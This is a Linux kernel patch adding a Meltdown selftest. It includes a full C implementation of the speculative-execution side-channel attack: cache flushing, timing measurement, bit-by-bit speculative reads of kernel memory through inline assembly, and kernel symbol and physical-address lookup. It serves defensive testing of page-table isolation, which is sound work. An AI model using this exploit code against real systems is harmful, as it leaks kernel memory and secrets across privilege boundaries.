[v2] selftest/x86/meltdown: Add a selftest for meltdown

Message ID Y8n8YTgjSIw4speQ@ziqianlu-desk1
State New
Headers
Series [v2] selftest/x86/meltdown: Add a selftest for meltdown |

Commit Message

Aaron Lu Jan. 20, 2023, 2:28 a.m. UTC
  To capture potential programming errors like mistakenly setting Global
bit on kernel page table entries, a selftest for meltdown is added.

This selftest is based on
https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c

In addition to the existing test of reading kernel variable
saved_command_line from user space, one more test of reading user local
variable through kernel direct map address is added. For the existing
test to report a failure, both the high kernel mapping and low kernel
mapping have to be in leaked state; For the added test, only low kernel
mapping leak is enough to trigger a test fail, so both tests are useful.

Test results of 10 runs:

On v6.1-rc8 with nopti kernel cmdline option:

host              test_out_rate_1    test_out_rate_2
lkp-bdw-de1            50%               100%
lkp-hsw-d01            70%               100%
lkp-hsw-d02             0%                80%
lkp-hsw-d03            60%               100%
lkp-hsw-d04            20%               100%
lkp-hsw-d05            60%               100%
lkp-ivb-d01             0%                70%
lkp-kbl-d01           100%               100%
lkp-skl-d02           100%                90%
lkp-skl-d03            90%               100%
lkp-skl-d05            60%               100%
kbl-vm                100%                80%
2 other machines have 0% rate for both tests.

bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.

test_out_rate_1: test reports fail rate for the test of reading
saved_command_line from user space;
test_out_rate_2: test reports fail rate for the test of reading user
local variable through kernel direct map address in user space.

On v5.19 without nopti cmdline option:
host              test_out_rate_2
lkp-bdw-de1            80%
lkp-hsw-4ex1           50%
lkp-hsw-d01            30%
lkp-hsw-d03            10%
lkp-hsw-d04            10%
lkp-kbl-d01            10%
kbl-vm                 80%
7 other machines have 0% rate for test2.

Also tested on an i386 VM with 512M memory and the test out rate is 100%
when adding nopti to kernel cmdline with v6.1-rc8.

Main changes I made from ltp's meltdown test:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library
  functions;
- Coding style changes: placing the function return type in the same
  line of the function.

Signed-off-by: Aaron Lu <aaron.lu@intel.com>
Reviewed-by: Pavel Boldin <boldin.pavel@gmail.com>
---
v2: add Pavel Boldin's reviewed-by tag.

 tools/testing/selftests/x86/Makefile   |   2 +-
 tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++
 2 files changed, 530 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/meltdown.c
  

Patch

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@  CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
 TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
 			check_initial_reg_state sigreturn iopl ioperm \
 			test_vsyscall mov_ss_trap \
-			syscall_arg_fault fsgsbase_restore sigaltstack
+			syscall_arg_fault fsgsbase_restore sigaltstack meltdown
 TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..fcb211dc9038
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,529 @@ 
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2018 Pavel Boldin <pboldin@cloudlinux.com>
+ * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdarg.h>
+#include <string.h>
+#include <signal.h>
+#include <ucontext.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/utsname.h>
+#include <sys/mman.h>
+
+#define PAGE_SHIFT	12
+#define PAGE_SIZE	0x1000
+#define PUD_SHIFT       30
+#define PUD_SIZE        (1UL << PUD_SHIFT)
+#define PUD_MASK        (~(PUD_SIZE - 1))
+
+size_t cache_miss_threshold;
+unsigned long directmap_base;
+
+#define TARGET_OFFSET	9
+#define TARGET_SIZE	(1 << TARGET_OFFSET)
+#define BITS_BY_READ	2
+
+static inline uint64_t rdtsc(void)
+{
+	uint32_t eax, edx;
+	uint64_t tsc_val;
+	/*
+	 * The lfence is to wait (on Intel CPUs) until all previous
+	 * instructions have been executed. If software requires RDTSC to be
+	 * executed prior to execution of any subsequent instruction, it can
+	 * execute LFENCE immediately after RDTSC
+	 *                                              */
+	__asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx));
+	tsc_val = ((uint64_t)edx) << 32 | eax;
+	return tsc_val;
+}
+
+static inline void clflush(volatile void *__p)
+{
+	asm volatile("clflush %0" : "+m" (*(volatile char *)__p));
+}
+
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+
+static void clflush_target(void)
+{
+	int i;
+
+	for (i = 0; i < BITS_BY_READ; i++)
+		clflush(&target_array[i * TARGET_SIZE]);
+}
+
+extern char failshere[];
+extern char stopspeculate[];
+
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit)
+{
+	register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
+	asm volatile (
+		"1:\n\t"
+
+		".rept 300\n\t"
+		"add $0x141, %%rax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%rax\n\t"
+		"and $1, %%rax\n\t"
+		"shl $9, %%rax\n\t"
+		"jz 1b\n\t"
+
+		"movq (%[target], %%rax, 1), %%rbx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		: "rax", "rbx"
+	);
+#else /* defined(__x86_64__) */
+	asm volatile (
+		"1:\n\t"
+
+		".rept 300\n\t"
+		"add $0x141, %%eax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%eax\n\t"
+		"and $1, %%eax\n\t"
+		"shl $9, %%eax\n\t"
+		"jz 1b\n\t"
+
+		"movl (%[target], %%eax, 1), %%ebx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		: "rax", "ebx"
+	);
+#endif
+}
+
+#ifdef __i386__
+# define REG_RIP	REG_EIP
+#endif
+
+static void sigsegv(int sig, siginfo_t *siginfo, void *context)
+{
+	ucontext_t *ucontext = context;
+	unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP];
+	if (*prip != (unsigned long)failshere) {
+		printf("Segmentation fault at unexpected location %lx\n", *prip);
+		abort();
+	}
+	*prip = (unsigned long)stopspeculate;
+	return;
+}
+
+static int set_signal(void)
+{
+	struct sigaction act = {
+		.sa_sigaction = sigsegv,
+		.sa_flags = SA_SIGINFO,
+	};
+
+	return sigaction(SIGSEGV, &act, NULL);
+}
+
+static inline int get_access_time(volatile char *addr)
+{
+	unsigned long long time1, time2;
+	volatile int j __attribute__((__unused__));
+
+	time1 = rdtsc();
+	j = *addr;
+	time2 = rdtsc();
+
+	return time2 - time1;
+}
+
+static int cache_hit_threshold;
+static int hist[BITS_BY_READ];
+
+static void check(void)
+{
+	int i, time;
+	volatile char *addr;
+
+	for (i = 0; i < BITS_BY_READ; i++) {
+		addr = &target_array[i * TARGET_SIZE];
+
+		time = get_access_time(addr);
+
+		if (time <= cache_hit_threshold)
+			hist[i]++;
+	}
+}
+
+#define CYCLES 10000
+static int readbit(int fd, unsigned long addr, char bit)
+{
+	int i, ret;
+	static char buf[256];
+
+	memset(hist, 0, sizeof(hist));
+
+	for (i = 0; i < CYCLES; i++) {
+		/*
+		 * Make the to-be-stolen data cache and tlb hot
+		 * to increase success rate.
+		 */
+		ret = pread(fd, buf, sizeof(buf), 0);
+		if (ret < 0)
+			printf("[INFO]\tCan't read fd");
+
+		clflush_target();
+
+		speculate(addr, bit);
+		check();
+	}
+
+	if (hist[1] > CYCLES / 10)
+		return 1;
+	return 0;
+}
+
+static int readbyte(int fd, unsigned long addr)
+{
+	int bit, res = 0;
+
+	for (bit = 0; bit < 8; bit ++ )
+		res |= (readbit(fd, addr, bit) << bit);
+
+	return res;
+}
+
+static int mysqrt(long val)
+{
+	int root = val / 2, prevroot = 0, i = 0;
+
+	while (prevroot != root && i++ < 100) {
+		prevroot = root;
+		root = (val / root + root) / 2;
+	}
+
+	return root;
+}
+
+#define ESTIMATE_CYCLES	1000000
+static void set_cache_hit_threshold(void)
+{
+	long cached, uncached, i;
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
+		clflush(target_array);
+		uncached += get_access_time(target_array);
+	}
+
+	cached /= ESTIMATE_CYCLES;
+	uncached /= ESTIMATE_CYCLES;
+
+	cache_hit_threshold = mysqrt(cached * uncached);
+
+	printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n",
+		cached, uncached, cache_hit_threshold);
+}
+
+static unsigned long find_symbol_in_file(const char *filename, const char *symname)
+{
+	unsigned long addr;
+	char type, *buf;
+	int found;
+	FILE *fp;
+
+	fp = fopen(filename, "r");
+	if (!fp) {
+		printf("[INFO]\tFailed to open %s\n", filename);
+		return 0;
+	}
+
+	buf = malloc(4096);
+	if (!buf)
+		return 0;
+
+	found = 0;
+	while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) {
+		if (!strcmp(buf, symname)) {
+			found = 1;
+			break;
+		}
+	}
+
+	free(buf);
+	fclose(fp);
+
+	return found ? addr : 0;
+}
+
+static unsigned long find_kernel_symbol(const char *name)
+{
+	char systemmap[256];
+	struct utsname utsname;
+	unsigned long addr;
+
+	addr = find_symbol_in_file("/proc/kallsyms", name);
+	if (addr)
+		return addr;
+
+	if (uname(&utsname) < 0)
+		return 0;
+	sprintf(systemmap, "/boot/System.map-%s", utsname.release);
+	addr = find_symbol_in_file(systemmap, name);
+	return addr;
+}
+
+static unsigned long saved_cmdline_addr;
+static int spec_fd;
+
+#define READ_SIZE 32
+
+static int test_read_saved_command_line(void)
+{
+	unsigned int i, score = 0, ret;
+	unsigned long addr;
+	unsigned long size;
+	char read[READ_SIZE] = { 0 };
+	char expected[READ_SIZE] = { 0 };
+	int expected_len;
+
+	saved_cmdline_addr = find_kernel_symbol("saved_command_line");
+	if (!saved_cmdline_addr) {
+		printf("[SKIP]\tCan not find symbol saved_command_line\n");
+		return 0;
+	}
+	printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr);
+
+	spec_fd = open("/proc/cmdline", O_RDONLY);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open /proc/cmdline\n");
+		return 0;
+	}
+
+	expected_len = pread(spec_fd, expected, sizeof(expected), 0);
+	if (expected_len < 0) {
+		printf("[SKIP]\tCan't read /proc/cmdline\n");
+		return 0;
+	}
+
+	/* read address of saved_cmdline_addr */
+	addr = saved_cmdline_addr;
+	size = sizeof(addr);
+	for (i = 0; i < size; i++) {
+		ret = readbyte(spec_fd, addr);
+		read[i] = ret;
+		addr++;
+	}
+
+	/* read value pointed to by saved_cmdline_addr */
+	memcpy(&addr, read, sizeof(addr));
+	memset(read, 0, sizeof(read));
+	printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
+	size = expected_len;
+
+	if (!addr)
+		goto done;
+
+	for (i = 0; i < size; i++) {
+		ret = readbyte(spec_fd, addr);
+		read[i] = ret;
+		addr++;
+	}
+
+	for (i = 0; i < size; i++)
+		if (expected[i] == read[i])
+			score++;
+
+done:
+	if (score > size / 2) {
+		printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n");
+		ret = -1;
+	} else {
+		printf("[OK]\ttest_read_saved_command_line: no leak found.\n");
+		ret = 0;
+	}
+
+	close(spec_fd);
+
+	return ret;
+}
+
+static int get_directmap_base(void)
+{
+	char *buf;
+	FILE *fp;
+	size_t n;
+	int ret;
+
+	fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (!fp)
+		return -1;
+
+	buf = NULL;
+	ret = -1;
+	while (getline(&buf, &n, fp) != -1) {
+		if (!strstr(buf, "Kernel Mapping"))
+			continue;
+
+		if (getline(&buf, &n, fp) != -1 &&
+		    sscanf(buf, "0x%lx", &directmap_base) == 1) {
+			printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+			directmap_base &= PUD_MASK;
+			ret = 0;
+			break;
+		}
+	}
+
+	fclose(fp);
+	free(buf);
+	return ret;
+}
+
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	int fd, ret;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (ret == -1) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		ret = -1;
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		ret = -1;
+		goto out;
+	}
+
+	ret = 0;
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+
+out:
+	close(fd);
+	return ret;
+}
+
+static int test_read_local_var(void)
+{
+	char path[] = "/tmp/meltdown.XXXXXX";
+	char string[] = "test string";
+	unsigned long phys;
+	int i, len, ret;
+	char *result;
+	void *p;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	spec_fd = mkstemp(path);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open %s\n", path);
+		return 0;
+	}
+	ftruncate(spec_fd, 0x1000);
+
+	p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0);
+	if (p == MAP_FAILED) {
+		printf("[SKIP]\tmmap spec_fd failed\n");
+		return 0;
+	}
+	memcpy(p, string, sizeof(string));
+
+	if (virt_to_phys((unsigned long)p, &phys) == -1) {
+		printf("[SKIP]\tCan not convert virtual address to physical address\n");
+		return 0;
+	}
+
+	len = strlen(string);
+	result = malloc(len + 1);
+	if (!result) {
+		printf("[SKIP]\tNot enough memory for malloc\n");
+		return 0;
+	}
+	memset(result, 0, len + 1);
+
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = readbyte(spec_fd, directmap_base + phys);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n");
+	else
+		printf("[OK]\ttest_read_local_var: no leak found.\n");
+
+	free(result);
+	munmap(p, 0x1000);
+	close(spec_fd);
+
+	return ret;
+}
+
+int main(void)
+{
+	int ret1, ret2;
+
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	set_cache_hit_threshold();
+
+	memset(target_array, 1, sizeof(target_array));
+
+	if (set_signal() < 0) {
+		printf("[SKIP]\tCan not set handler for segfault\n");
+		return 0;
+	}
+
+	ret1 = test_read_local_var();
+	ret2 = test_read_saved_command_line();
+
+	if (ret1 || ret2)
+		return -1;
+
+	return 0;
+}